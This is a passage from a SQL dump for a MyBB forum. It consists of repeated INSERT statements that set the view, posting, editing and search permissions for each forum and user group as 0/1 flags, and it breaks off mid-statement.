INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('341', '60', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('342', '60', '12', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('343', '60', '13', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('501', '61', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('502', '61', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('503', '61', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('504', '61', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('505', '61', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('506', '61', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('507', '61', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('508', '61', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('509', '61', '13', '1', '1', '0', '1', '1', '1', '0', '0', '1', '0', '0', '0', '1', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('271', '62', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('272', '62', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('273', '62', '3', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('274', '62', '5', '1', '0', '1', '0', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('275', '62', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('276', '62', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('277', '62', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('278', '62', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('279', '62', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('280', '62', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('982', '50', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('605', '5', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('292', '2', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('827', '43', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('633', '19', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('295', '28', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('296', '29', '15', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('297', '39', '15', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('849', '30', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('443', '31', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('461', '44', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('470', '45', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('691', '48', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('991', '50', '15', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('304', '54', '15', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('344', '60', '15', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('510', '61', '15', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('307', '62', '15', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('311', '46', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('312', '46', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('830', '16', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('816', '64', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('817', '64', '8', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('818', '64', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('819', '64', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('820', '64', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('821', '64', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('371', '66', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('372', '66', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('373', '66', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('374', '66', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('375', '66', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('376', '66', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('377', '66', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('378', '66', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('379', '66', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('380', '66', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('606', '5', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('692', '48', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('634', '19', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('992', '50', '17', '0', '0', '1', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('635', '19', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('444', '31', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('462', '44', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, 